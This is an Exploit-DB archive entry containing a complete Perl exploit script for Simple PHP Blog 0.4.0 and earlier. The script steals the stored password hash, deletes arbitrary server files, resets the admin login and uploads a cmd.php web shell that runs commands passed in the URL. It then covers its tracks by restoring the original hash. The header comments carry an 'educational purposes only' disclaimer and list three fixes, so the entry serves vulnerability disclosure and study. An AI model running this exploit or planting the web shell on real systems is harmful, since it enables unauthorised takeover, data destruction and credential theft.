Simple PHP Blog <= 0.4.0 - Multiple Remote Exploits

2005-09-01T00:00:00
ID EDB-ID:1191
Type exploitdb
Reporter Kenneth Belva
Modified 2005-09-01T00:00:00

Description

Simple PHP Blog <= 0.4.0 Multiple Remote Exploits. CVE-2005-2192,CVE-2005-2733,CVE-2005-2787. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl -w
#===============================================================================
#	Title:		sphpblog_vulns.pl
#
#	Written by: 	Kenneth F. Belva, CISSP
#			Franklin Technologies Unlimited, Inc.
#			http://www.ftusecurity.com
#
#	Date: 		August 25, 2005
#
#	Version:	0.1
#
#	Description:	This program is for educational purposes only!
#			SimplePHPBlog as a few vulnerability which this
#			perl script demonstrates via an exploit.
#
#	Instructions:	Should be self-explanatory via the .pl help menu
#
#	Solutions:	
#			*** Solution 1
#			Change the line in comment_delete_cgi.php from
#			$logged_in = logged_in( false, true );    to
#			$logged_in = logged_in( true, true );
#
#			*** Solution 2
#			Place an .htaccess file with the following config in
#			the ./config directory:
#
#
#			#---------------------
#			#Snip .htaccess start
#			#---------------------			
#			IndexIgnore *
#
#			&lt;Files .htaccess&gt;
#			order allow,deny
#			deny from all
#			&lt;/Files&gt;
#			
#			&lt;Files *.txt&gt;
#			order allow,deny
#			deny from all
#			&lt;/Files&gt;
#			#---------------------
#			#Snip .htaccess end
#			#---------------------
#
#
#			*** Solution 3
#			See http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0885.html
#				for PHP modification to upload image script.
#===============================================================================



#-------------------------------------------------------------------------------
#	Global Paramaters
#-------------------------------------------------------------------------------
use strict;
use warnings;

use vars qw/ %args /;

use Getopt::Std;
require LWP::UserAgent;
my $ua = LWP::UserAgent-&gt;new;

#-------------------------------------------------------------------------------
#	Global Routines
#-------------------------------------------------------------------------------

#Determine Operating System
my $OperatingSystem = $^O;
my $unix = "";

#Set OS Parameter
if (index(lc($OperatingSystem),"win")!=-1){
		   $unix="0"; #windows system
	    }else{
		    $unix="1"; #unix system
	    }

#-------------------------------------------------------------------------------
#	The Main Menu
#-------------------------------------------------------------------------------

sub menu()
    {
	    if ($unix){system("clear");}
	    	else{system("cls");}

	    print "
________________________________________________________________________________
		  SimplePHPBlog v0.4.0 Exploits
			     by
		     Kenneth F. Belva, CISSP
		   http://www.ftusecurity.com
________________________________________________________________________________

	Program	: $0
	Version	: v0.1
	Date	: 8/25/2005
	Descript: This perl script demonstrates a few flaws in
		  SimplePHPBlog.
	
	Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
		  DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO 
		  NOT HAVE PERMISSION TO DO SO!
		  
		  Please see this script comments for solution/fixes 
		  to demonstrated vulnerabilities. 
		  http://www.simplephpblog.com

	Usage	: $0 [-h host] [-e exploit]
	
		-?      : this menu
		-h      : host
		-e	: exploit
			(1)	: Upload cmd.php in [site]/images/
			(2)	: Retreive Password file (hash)
			(3)	: Set New User Name and Password
				[NOTE - uppercase switches for exploits]
				-U	: user name
				-P	: password
			(4)	: Delete a System File
				-F	: Path and System File 

	Examples: $0 -h 127.0.0.1 -e 2
		  $0 -h 127.0.0.1 -e 3 -U l33t -P l33t
		  $0 -h 127.0.0.1 -e 4 -F ./index.php
		  $0 -h 127.0.0.1 -e 4 -F ../../../etc/passwd
		  $0 -h 127.0.0.1 -e 1
	";	
        
	exit;
    }


#-------------------------------------------------------------------------------
#	Initial Routine
#-------------------------------------------------------------------------------

    sub init()
    {

	use Switch;
	
	# colon ':' after letter says that option takes variable
        my $opt_string = 'e:U:P:h:F:?';
        getopts( "$opt_string", \%args ) or menu();
	
	#Load parameters
	my $exploit = $args{e};
	my $host = $args{h};
	my $user = $args{U};
	my $pass = $args{P};
	my $file = $args{F};
	
	# What shall we do today?
	switch (%args) {
		case "?"	{ menu();}
		case "e"	{
				switch ($exploit) {
					
					if ($unix){system("clear");}
					else{system("cls");}
					
					print "
________________________________________________________________________________
		  SimplePHPBlog v0.4.0 Exploits
			     by
		     Kenneth F. Belva, CISSP
		    http://www.ftusecurity.com
________________________________________________________________________________";


					# Upload cmd.php to /images
					case "1" {	print "\nRunning cmd.php Upload Exploit....\n\n";
							&UploadCmdPHP($host);}
					# Retrieve Username & Password hash
					case "2" {	print "\nRunning Username and Password Hash Retrieval Exploit....\n\n";
							&RetrievePwd($host."/config/password.txt");}
					# Replace Username and Password
					case "3" {	print "\nRunning Set New Username and Password Exploit....\n\n";
							&SetUserPwd($host,$user,$pass);}
					# Delete a System File
					case "4" {	print "\nRunning Delete System File Exploit....\n\n";
							&DeleteFile($host . "/comment_delete_cgi.php?y=05&m=08&comment=",$file);}

					} #end $exploit switch
					print "\n\n\n*** Exploit Completed....\nHave a nice day! :)\n";
				} #end "e" case
		else		{ menu();}
		} #end %args switch

    } #end sub init

#-------------------------------------------------------------------------------
#	Exploit #1: Upload File Via POST 
#-------------------------------------------------------------------------------

sub UploadCmdPHP {

	
	my($url) = @_;
	
	use LWP;
	use HTTP::Request::Common qw(POST);
	my $ua = LWP::UserAgent-&gt;new;
	
	$HTTP::Request::Common::DYNAMIC_FILE_UPLOAD++;

	#Step 1: Retrieve hash
	#-----------------------------------------------------------------------
	my $hash = &RetrievePwd($url."/config/password.txt");
	

	#Step 2: Delete Existing Password file (SetUserPwd)
	#Step 3: Create a temporary user id and password (SetUserPwd)
	#-----------------------------------------------------------------------
	&SetUserPwd($url,"a","a");
	

	#Step 4: Log into the app and get the PHPSession / my_id session variable
	#-----------------------------------------------------------------------
	my $SETcookie = &strip_session(&Login($url . "/login_cgi.php","a","a"));
	
	
	#Step 5: Create and upload our scripts (cmd.php & reset.php)
	#-----------------------------------------------------------------------
		&CreateTempPHPs();
	
	# Upload cmd.php
	my $path = "./cmd.php";
	my $file = "cmd.php";
	my $req = POST($url."/upload_img_cgi.php",
		Cookie =&gt; 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,
		Content_Type =&gt; 'form-data',
		Content =&gt; [userfile =&gt; [$path,$file],],
		);
	
	my $response = $ua-&gt;request($req);
	print "\nCreated cmd.php on target host: " . $url;
	#$response-&gt;is_success or die "Failed to POST '$url': ", $response-&gt;status_line;
	#return $response-&gt;as_string;
	
	# Upload reset.php
	$path = "./reset.php";
	$file = "reset.php";
		
	$req = POST($url."/upload_img_cgi.php",
		Cookie =&gt; 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,
		Content_Type =&gt; 'form-data',
		Content =&gt; [userfile =&gt; [$path,$file],],
		);
	
	$response = $ua-&gt;request($req);
	print "\nCreated reset.php on target host: " . $url;
	#$response-&gt;is_success or die "Failed to POST '$url': ", $response-&gt;status_line;
	#return $response-&gt;as_string;
	
		#Remove local PHP files
		&RemoveTempPHPs();

		
	#Step 6: Reset origional Passwpord
	#-----------------------------------------------------------------------
	&ResetHash($url."/images/reset.php",$hash);

	
	#Step 7: Pass command to delete reset.php (clean up)
	#-----------------------------------------------------------------------
	&DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=","./images/reset.php");
	print "\nRemoved reset.php from target host: " . $url;

	print "\n\nTo run command please go to following link: \n\t" . $url."/images/cmd.php?cmd=[your command]";
}

#-------------------------------------------------------------------------------
#	Exploit #2: Retrieve Password File 
#-------------------------------------------------------------------------------

sub RetrievePwd {
	
	my($url) = @_;
	
	use LWP;
	use HTTP::Request::Common;
	my $ua = LWP::UserAgent-&gt;new;

	my $req = GET($url);
	
	my $response = $ua-&gt;request($req);

	$response-&gt;is_success or die "Failed to POST '$url': ", $response-&gt;status_line;
	
	my $hash = $response-&gt;content;
	print "\nRetrieved Username and Password Hash: " . $hash; 
	return $hash

}


#-------------------------------------------------------------------------------
#	Exploit #3: Set New Username and Password 
#-------------------------------------------------------------------------------

sub SetUserPwd{

	my($url,$user,$pass) = @_;

	&DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=", "./config/password.txt");
	&ResetPwd($url . "/install03_cgi.php?blog_language=english",$user,$pass);
}


#-------------------------------------------------------------------------------
#	POST to Reset Username and Password (must delete password file first)
#-------------------------------------------------------------------------------

sub ResetPwd {
	
	my($url,$user,$pass) = @_;
	
	use LWP;
	use HTTP::Request::Common;
	my $ua = LWP::UserAgent-&gt;new;

	my $req = POST($url,
		      [ user  =&gt; $user,
			pass =&gt; $pass,
			submit =&gt; '%C2%A0Submit%C2%A0'
			]
		);
	
	my $response = $ua-&gt;request($req);

	$response-&gt;is_success or die "Failed to POST '$url': ", $response-&gt;status_line;

	print "\n./config/password.txt created!";
	print "\nUsername is set to: ".$user;
	print "\nPassword is set to: ".$pass;
	
}


#-------------------------------------------------------------------------------
#	Exploit #4: Delete Password File 
#-------------------------------------------------------------------------------

sub DeleteFile {
	
	my($url,$file) = @_;
	
	use LWP;
	use HTTP::Request::Common;
	my $ua = LWP::UserAgent-&gt;new;

	my $req = GET($url.$file);
	
	my $response = $ua-&gt;request($req);

	$response-&gt;is_success or die "Failed to POST '$url': ", $response-&gt;status_line;
	print "\nDeleted File: ".$file; 
	
}


#-------------------------------------------------------------------------------
#	log into site
#-------------------------------------------------------------------------------

sub Login {

	my($url,$user,$pass) = @_;
	
	use LWP;
	use HTTP::Request::Common;
	my $ua = LWP::UserAgent-&gt;new;

	my $req = POST($url,
		      [ user  =&gt; $user,
			pass =&gt; $pass,
			submit =&gt; '%C2%A0Submit%C2%A0'
			]
		);
	
	my $response = $ua-&gt;request($req);

	$response-&gt;is_success or die "Failed to POST '$url': ", $response-&gt;status_line;

	print "\nLogged into SimplePHPBlog at: ".$url;
	print "\nCurrent Username '".$user."' and Password '".$pass."'...";
	
	return $response-&gt;header('Set-Cookie');
	
}


#-------------------------------------------------------------------------------
#	POST the hash
#-------------------------------------------------------------------------------

sub ResetHash {

	my($url,$hash) = @_;
	
	use LWP;
	use HTTP::Request::Common;
	my $ua = LWP::UserAgent-&gt;new;

	my $req = POST($url,
		      [ hash  =&gt; $hash]
		);
	
	my $response = $ua-&gt;request($req);

	$response-&gt;is_success or die "Failed to POST '$url': ", $response-&gt;status_line;

	print "\nReset Hash at: ".$url;
	print "\nReset Hash value: ".$hash;
	
	
}


#------------------------------------------------------
# Create Temp PHP files
#------------------------------------------------------

sub CreateTempPHPs{

	my($hash) = @_;

	open(PHPFILE, "&gt;./cmd.php");
	print PHPFILE &CreateCmdPHP();
	close PHPFILE;
	print "\nCreated cmd.php on your local machine.";
	
	open(PHPFILE, "&gt;./reset.php");
	print PHPFILE &CreateResetPHP();
	close PHPFILE;
	print "\nCreated reset.php on your local machine.";	
}

#------------------------------------------------------
# Remove Temp PHP files
#------------------------------------------------------

sub RemoveTempPHPs{

	unlink("./cmd.php");
	print "\nRemoved cmd.php from your local machine.";
	unlink("./reset.php");
	print "\nRemoved reset.php from your local machine.";
	
}


#------------------------------------------------------
# strip_session - Get PHP Session Variable
#------------------------------------------------------

sub strip_session {
	
	my($savedata) = @_;

	my $PHPstring = "PHPSESSID";
	my $semi = "\;";
	
	my $datalength = length($savedata);
	my $PHPstart= (index $savedata, $PHPstring)+10;
	my $PHPend = index $savedata,$semi,$PHPstart;
	my $PHPsession= substr $savedata, $PHPstart, ($PHPend-$PHPstart);
	return $PHPsession;
	
}


sub CreateCmdPHP(){
	
	return "

&lt;?php

\$cmd = \$_GET[\'cmd\'];
echo \'&lt;hr/&gt;&lt;pre&gt;\';
echo \'Command: \' . \$cmd;
echo '&lt;/pre&gt;&lt;hr/&gt;&lt;br&gt;';

echo '&lt;pre&gt;';
\$last_line = system(\$cmd,\$output);
echo \'&lt;/pre&gt;&lt;hr/&gt;\';
?&gt;.
"; # end 
	
}


sub CreateResetPHP(){
	
	return "

&lt;?php

\$hash = \$_POST[\'hash\'];
\$fp = fopen(\"../config/password.txt\",\"w\");
fwrite(\$fp,\$hash);
fpclose(\$fp);

?&gt;
"; #end return

}


#------------------------------------------------------
# 	Begin Routines
#------------------------------------------------------
	init();

# milw0rm.com [2005-09-01]